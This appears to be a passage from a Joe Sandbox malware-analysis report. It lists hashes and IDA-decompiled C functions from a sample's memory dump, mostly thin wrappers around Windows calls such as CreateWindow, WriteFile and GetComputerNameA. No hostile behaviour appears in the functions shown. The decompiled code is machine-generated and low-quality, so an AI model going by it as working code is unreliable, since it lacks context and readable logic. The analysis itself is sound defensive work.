Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 85b28a6e909be971fa5c2b10f844aa2cfc1bbfc1f3ab945af7c68de878036d31
Instruction ID: 2d7956092cb8c6c0a4803f008808c1ff7e10d83777fa5081e157e7355fbe1d3f
Opcode Fuzzy Hash: 85b28a6e909be971fa5c2b10f844aa2cfc1bbfc1f3ab945af7c68de878036d31
Instruction Fuzzy Hash: 15E002F2204309BFDB00DE8ADCC1DABB7ACFB4C654F804105BB1C972428275AC608B71

Uniqueness

Uniqueness Score: -1.00%

Function 0042DD50 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0042DD50(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				signed int _t17;

				_t16 = __edx;
				_t15 = __ecx;
				_t17 = _a16;
				if(__eax == 2) {
					_t17 = _t17 | 0x00000100;
				}
				_push(_a4);
				_push(_a8);
				_push(_a12);
				_push(_t17);
				_push(_a20);
				_push(_a24);
				_t14 = _a28;
				_push(_t14);
				_push(_t15);
				_push(_t16); // executed
				L004058EC(); // executed
				return _t14;
			}

0x0042dd50
0x0042dd50
0x0042dd54
0x0042dd59
0x0042dd5b
0x0042dd5b
0x0042dd64
0x0042dd68
0x0042dd6c
0x0042dd6d
0x0042dd71
0x0042dd75
0x0042dd76
0x0042dd79
0x0042dd7a
0x0042dd7b
0x0042dd7c
0x0042dd83

APIs

6D2B64E0.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD7C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 631e09257d349a70686c2b9a3fb90cce6fe6e24f79502f7a3101c31c28807355
Instruction ID: 657dc707ebcff19dbeb2ff18312c7b534856d620e183bd2699373ed431cc6579
Opcode Fuzzy Hash: 631e09257d349a70686c2b9a3fb90cce6fe6e24f79502f7a3101c31c28807355
Instruction Fuzzy Hash: 28E07EB2A10119AF9B40DE8CEC81EEB37ADAB1D350B408016FA08D7200C2B4EC619BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004531A8 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004531A8(intOrPtr* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v300;
				intOrPtr _v304;
				void* _t7;
				void* _t8;
				intOrPtr* _t14;
				signed char* _t20;

				_t14 = __ecx;
				_t8 = E00451554(_t7, _t20, __edx, __eflags); // executed
				if(_t8 == 0xffffffff) {
					L3:
					 *_t14 = 0;
					__eflags = 0;
					 *((intOrPtr*)(_t14 + 4)) = 0;
					return 0;
				}
				FindClose(_t8);
				if(( *_t20 & 0x00000010) != 0) {
					goto L3;
				}
				 *_t14 = _v304;
				 *((intOrPtr*)(_t14 + 4)) = _v300;
				return 1;
			}

0x004531af
0x004531b3
0x004531bb
0x004531da
0x004531de
0x004531e0
0x004531e2
0x00000000
0x004531e2
0x004531be
0x004531c7
0x00000000
0x00000000
0x004531cd
0x004531d3
0x00000000

APIs

FindClose.KERNEL32(00000000,000000FF,00468B96,00000000,0046984E,?,00000000,00469897,?,00000000,004699D0,?,00000000,?,00000000), ref: 004531BE

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 44e6222c1d95386c18e67b408ec02326282b71d3d3faab1e5d656652a1158ce1
Instruction ID: 323aeabcd02059172e6a86a6d4cd6512fbbfe936bf6d469df606904342e840dd
Opcode Fuzzy Hash: 44e6222c1d95386c18e67b408ec02326282b71d3d3faab1e5d656652a1158ce1
Instruction Fuzzy Hash: 4FE09BB06046008BCB14CF3988803567AD15F85321F08C96AFC59CB3D7E63DD5095767

Uniqueness

Uniqueness Score: -1.00%

Function 00414894 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00414894(intOrPtr* __eax, intOrPtr* __edx) {

				_push( *((intOrPtr*)(__edx + 8)) -  *__edx);
				_push( *((intOrPtr*)(__edx + 0xc)) -  *((intOrPtr*)(__edx + 4)));
				return  *((intOrPtr*)( *__eax + 0x4c))();
			}

0x004148a1
0x004148aa
0x004148ba

APIs

KiUserCallbackDispatcher.NTDLL(004880F6,?,00488116,?,?,00000000,004880F6,?,?), ref: 004148B3

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00406FAC Relevance: 1.5, APIs: 1, Instructions: 23
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00406FAC(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}

0x00406faf
0x00406fc0
0x00406fc7
0x00406fc9
0x00406fc9
0x00406fd7

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406FC0

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 85229c5ab6443546c4d7ada4fe6e16972f4d1f4052e8b5d3a6116daef923843e
Instruction ID: c24772f8fa0902c48709f12b323a54ded4e47ae862b831ec1ca8631073ecd2d8
Opcode Fuzzy Hash: 85229c5ab6443546c4d7ada4fe6e16972f4d1f4052e8b5d3a6116daef923843e
Instruction Fuzzy Hash: 64D05BB23092107AE224955B6C44EAB6BDCCBC5774F11063EF568C31C1D6708C018675

Uniqueness

Uniqueness Score: -1.00%

Function 00423864 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423864(struct HWND__* __eax, int __edx, void* __eflags) {
				int _t3;
				void* _t8;
				int _t10;
				struct HWND__* _t11;

				_t10 = __edx;
				_t11 = __eax;
				_t8 = E00423810();
				if(_t8 != 0) {
					E00423840(0);
				}
				_t3 = ShowWindow(_t11, _t10); // executed
				if(_t8 != 0) {
					return E00423840(1);
				}
				return _t3;
			}

0x00423867
0x00423869
0x00423870
0x00423874
0x00423878
0x00423878
0x0042387f
0x00423886
0x00000000
0x0042388a
0x00423892

APIs

Part of subcall function 00423810: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 00423825

ShowWindow.USER32(00410868,00000009,?,00000000,0041EFBC,00423B52,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0042387F

Part of subcall function 00423840: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 0042385C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: InfoParametersSystem$ShowWindow
String ID:
API String ID: 3202724764-0
Opcode ID: fa9cbd9ceca1322ed2924bdf72900a6430fc091ccc3f29640bec95ff0d00d84b
Instruction ID: ca9223d853fcb90c94abb5ffd669365a356a24bdff21032da78e46cfaacecbfd
Opcode Fuzzy Hash: fa9cbd9ceca1322ed2924bdf72900a6430fc091ccc3f29640bec95ff0d00d84b
Instruction Fuzzy Hash: 3CD0A7527412301143103AB73C5599B82E84DC26A7348043BF650DF353E91DCE0510FC

Uniqueness

Uniqueness Score: -1.00%

Function 004244DC Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004244DC(void* __eax, void* __edx, void* __edi) {
				void* __ebx;
				void* __esi;
				int _t10;

				_t11 = __eax;
				if( *((char*)(__eax + 0x7e)) == 0) {
					_t3 = _t11 + 0x6c; // 0x21d247c
					return E00403598(_t3, __eax, __edx, __edi, __edx);
				} else {
					_t10 = SetWindowTextA( *(_t11 + 0x20), E00403880(__edx)); // executed
					return _t10;
				}
			}

0x004244e0
0x004244e6
0x004244fc
0x00424508
0x004244e8
0x004244f4
0x004244fb
0x004244fb

APIs

SetWindowTextA.USER32(?,00000000), ref: 004244F4

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 992f391fe162daed673ab61c574adb3f239a6921a0669f29555344c1fd265b61
Instruction ID: d5f67cecbba580fcac4e59b15a5996bcd41a91beb856dc26b49ece42d98d113d
Opcode Fuzzy Hash: 992f391fe162daed673ab61c574adb3f239a6921a0669f29555344c1fd265b61
Instruction Fuzzy Hash: 50D05EE37001302BCB01BAED58C4BC667CC9B8D25AB1540FBF904EB2A7C678DE408398

Uniqueness

Uniqueness Score: -1.00%

Function 004539E8 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004539E8(void* __eax) {
				char _v20;
				int _t5;
				void* _t10;
				DWORD* _t13;

				_t13 =  &_v20;
				_t10 = __eax;
				 *_t13 = 0x10;
				_t5 = GetComputerNameA( &_v20, _t13); // executed
				if(_t5 == 0) {
					return E00403548(_t10);
				}
				return E004036A4(_t10, 0x10,  &_v20);
			}

0x004539e9
0x004539ec
0x004539ee
0x004539fb
0x00453a02
0x00000000
0x00453a18
0x00000000

APIs

GetComputerNameA.KERNEL32 ref: 004539FB

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: f8d0eccbd651e664495e9ccae9e179e7cda3a170efafe651652047d0f8810509
Instruction ID: 172cdff566b80fbf7b8476fddc883b8cc76f07f2569d7b8c26a9c4b9e5298cac
Opcode Fuzzy Hash: f8d0eccbd651e664495e9ccae9e179e7cda3a170efafe651652047d0f8810509
Instruction Fuzzy Hash: 53D0C2B120420027C7006E658C8169A718C9B84302F000D3E7CC6D73D3EB7ECE589A2A

Uniqueness

Uniqueness Score: -1.00%

Function 0046073C Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0046073C(void* __ecx, intOrPtr* __edx) {

				_push( *((intOrPtr*)(__edx + 0x2c)));
				_push( *((intOrPtr*)(__edx + 0x30)) - __ecx);
				return  *((intOrPtr*)( *__edx + 0x4c))();
			}

0x00460743
0x00460749
0x00460759

APIs

KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,004613B4,00000000,00000000,00000000,00400000,STOPIMAGE,0000000C,00000000), ref: 00460754

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00406F5C Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

6D2B5CA0.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040AADC,0040D088,?,?,00000000), ref: 00406F79

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cadb5b147ace2468a6f46023c56f2b685aa8f606246d6e3bbcd1633f26c17912
Instruction ID: fbf433f388ee34c674fb7f0d47a908a919ece7d44da589a3048eb8b88fcd3b6d
Opcode Fuzzy Hash: cadb5b147ace2468a6f46023c56f2b685aa8f606246d6e3bbcd1633f26c17912
Instruction Fuzzy Hash: 16C048A138030032F92026B60C87F2600885704F19E64857AB784BE1C2C8E9A808011C

Uniqueness

Uniqueness Score: -1.00%

Function 00432294 Relevance: 1.5, APIs: 1, Instructions: 13
comCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00432294(void* __ecx, void* __edi) {
				intOrPtr _t5;

				E00404B7C(0x48c91c);
				_push(0); // executed
				L0042CD3C(); // executed
				 *0x48c008 = E00431C74;
				 *0x48d678 = E0043214C(__ecx, 1, __edi);
				_t5 =  *0x48d020; // 0x44f4f4
				 *0x48d67c = _t5;
				 *0x48d020 = E00432130;
				return _t5;
			}

0x00432299
0x0043229e
0x004322a0
0x004322a5
0x004322bb
0x004322c0
0x004322c5
0x004322ca
0x004322d4

APIs

OleInitialize.OLE32(00000000), ref: 004322A0

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 3af01045843cbf528373a59c1293ec597d93157069626a6141eb3f9db482e417
Instruction ID: 585f100bb96e9d57a03b419eae856822037da0c64f70bee31af7cf89438149c0
Opcode Fuzzy Hash: 3af01045843cbf528373a59c1293ec597d93157069626a6141eb3f9db482e417
Instruction Fuzzy Hash: 5FD067B09022048ACB40BF65A985B4C3BE0A74E34CF51AA3FE248972A1D7BD54458B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00450220 Relevance: 1.5, APIs: 1, Instructions: 11
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00450220(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00450118( *_t7);
				}
				return _t4;
			}

0x00450221
0x00450227
0x0045022e
0x00000000
0x00450232
0x00450238

APIs

SetEndOfFile.KERNEL32(?,00000000,00466FB2), ref: 00450227

Part of subcall function 00450118: GetLastError.KERNEL32(00000001,0044FF96,00000000,?,00000000,00000000,?,00000080,00000000,?,00000000,?,?,0048A596,00000001,00000000), ref: 0045011B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 05f1c91ddef189d5ca6b774de87d878c40ba35594c3349ece120def876a2df58
Instruction ID: 3251114619a1741aed5afc9004d59ef94c3fcc580cc86817ff8c49fd6281e940
Opcode Fuzzy Hash: 05f1c91ddef189d5ca6b774de87d878c40ba35594c3349ece120def876a2df58
Instruction Fuzzy Hash: 12C04C65200514878F54A6AA85C590672DC5B0830975040A6B904CF207E669EC048725

Uniqueness

Uniqueness Score: -1.00%

Function 00407488 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00407488(void* __eax) {
				signed int _t4;

				_t4 = SetCurrentDirectoryA(E00403880(__eax)); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}

0x00407493
0x0040749a
0x0040749f

APIs

SetCurrentDirectoryA.KERNEL32(00000000,?,0048A562,00000000,0048A6FF,?,?,00000005,00000000,0048A733,?,?,00000000), ref: 00407493

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 89e2b87cdfa1798260bab94df247ada4683d7a7733ed33ae7715589495a06c3c
Instruction ID: 479e35c2b4c6a546465f085265dfd16f3481341c68164e43c451ea822ff303c0
Opcode Fuzzy Hash: 89e2b87cdfa1798260bab94df247ada4683d7a7733ed33ae7715589495a06c3c
Instruction Fuzzy Hash: F7B012F13A030B16CA007AFE4CC1A1A08DC46592093401B7E701AE31C3DC3CE808001C

Uniqueness

Uniqueness Score: -1.00%

Function 0042E37F Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0042E37F() {
				int _t4;
				intOrPtr _t7;
				void* _t8;

				_pop(_t7);
				 *[fs:eax] = _t7;
				_push(E0042E39D);
				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
				return _t4;
			}

0x0042e381
0x0042e384
0x0042e387
0x0042e390
0x0042e395

APIs

SetErrorMode.KERNEL32(?,0042E39D), ref: 0042E390

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: dd20601ff72eda468eccbe48834f33d9ba91696e01e81644fd325e8eb642afbd
Instruction ID: b85ea10cad000dbb67842e75b7f81d90e8e75e810439e906a79493006be36ac4
Opcode Fuzzy Hash: dd20601ff72eda468eccbe48834f33d9ba91696e01e81644fd325e8eb642afbd
Instruction Fuzzy Hash: A6B09B7670C6005DE705DB95741652D77E4D7C57113F14877F510D3580D53C7800852C

Uniqueness

Uniqueness Score: -1.00%

Function 00416804 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00416804(void* __eax) {
				intOrPtr _t3;

				_t3 =  *((intOrPtr*)(__eax + 0xc0));
				_push(_t3); // executed
				L00405F6C(); // executed
				return _t3;
			}

0x00416804
0x0041680a
0x0041680b
0x00416810

APIs

740C9840.USER32(?), ref: 0041680B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: C9840
String ID:
API String ID: 3822654940-0
Opcode ID: 0ebe11ebd7c7a4df9d9e0faee6d033ddc2646ddfecae204d56b219649ccd9660
Instruction ID: f3ca08df1fedb921085731b7742c99a343ba174f909a652da75cbd703e075cc8
Opcode Fuzzy Hash: 0ebe11ebd7c7a4df9d9e0faee6d033ddc2646ddfecae204d56b219649ccd9660
Instruction Fuzzy Hash: EBA002665015019ADA00E7B58849F7A2298BB48208FCD05F9718497452C63C98008A15

Uniqueness

Uniqueness Score: -1.00%

Function 004488EC Relevance: 1.4, APIs: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004488EC(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v21;
				signed int _v28;
				void* _t63;
				void* _t98;
				char _t108;
				char _t112;
				void* _t113;
				char _t114;
				intOrPtr _t138;
				intOrPtr _t147;
				intOrPtr _t150;
				char _t153;
				void* _t155;
				void* _t156;
				intOrPtr _t157;
				void* _t160;

				_t160 = __fp0;
				_t155 = _t156;
				_t157 = _t156 + 0xffffffe8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v28 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_t150 = _a4;
				_push(_t155);
				_push(0x448acc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t157;
				if( *((intOrPtr*)(_v12 + 0xc)) == 0) {
					__eflags =  *((intOrPtr*)(_v12 + 8));
					if(__eflags != 0) {
						L5:
						E004035DC( &_v28,  *((intOrPtr*)(_v12 + 0x18)));
						E00403900( &_v28, E004039A4(0x448ae8, _v28), 1);
						E00403900( &_v28, E004039A4(0x448ae8, _v28), 1);
						_t63 = E004036BC(_v28);
						__eflags = _t63 - 2;
						if(_t63 >= 2) {
							_v21 =  *_v28;
							E00403900( &_v28, 2, 1);
							_t153 =  *((intOrPtr*)(_t150 + 0xc)) - E004036BC(_v28);
							__eflags =  *_v28;
							if( *_v28 == 0) {
								_t153 = _t153 + 1;
								__eflags = _t153;
							}
							_v16 = E00431108(1, _t150);
							_t112 = E004036BC(_v28) - 2;
							__eflags = _t112;
							if(_t112 >= 0) {
								_t114 = _t112 + 1;
								__eflags = _t114;
								do {
									E004311D8(_v16, 0, _t150);
									_t114 = _t114 - 1;
									__eflags = _t114;
								} while (_t114 != 0);
							}
							_t113 = E004036BC(_v28);
							__eflags = _t113 - 2;
							if(_t113 >= 2) {
								do {
									_t98 = E004471BC(_t150, _t153);
									__eflags =  *((char*)(_v28 + _t113 - 1));
									E004312E0(_v16, E004437F0(_t98, _v28 & 0xffffff00 |  *((char*)(_v28 + _t113 - 1)) != 0x00000000), _t113 - 2);
									_t153 = _t153 + 1;
									_t113 = _t113 - 1;
									__eflags = _t113 - 1;
								} while (_t113 != 1);
							}
							__eflags =  *_v28;
							if( *_v28 == 0) {
								__eflags = 0;
								_v20 = 0;
							} else {
								_v20 = E004437F0(E004471BC(_t150, _t153), 1);
							}
							_push(_t155);
							_push(0x448aad);
							_push( *[fs:eax]);
							 *[fs:eax] = _t157;
							E00442554(_v8, _t113,  *((intOrPtr*)(_v12 + 8)), 0, _t150, _t153, _t160, _v20, _v16, 0); // executed
							E004486C0(_v8, GetLastError(), __eflags);
							__eflags = 0;
							_pop(_t138);
							 *[fs:eax] = _t138;
							_push(0x448ab4);
							E00443830(_v20);
							return E00443840(_v16);
						} else {
							goto L18;
						}
					} else {
						_t108 = E0044872C(_v8, 0, _v12, _t150, __esi, __eflags);
						__eflags = _t108;
						if(_t108 != 0) {
							goto L5;
						} else {
							goto L18;
						}
					}
				} else {
					L18:
					_pop(_t147);
					 *[fs:eax] = _t147;
					_push(0x448ad3);
					return E00403548( &_v28);
				}
			}

0x004488ec
0x004488ed
0x004488ef
0x004488f2
0x004488f3
0x004488f4
0x004488f7
0x004488fa
0x004488fd
0x00448900
0x00448905
0x00448906
0x0044890b
0x0044890e
0x00448918
0x00448924
0x00448928
0x00448940
0x00448949
0x00448965
0x00448981
0x00448989
0x0044898e
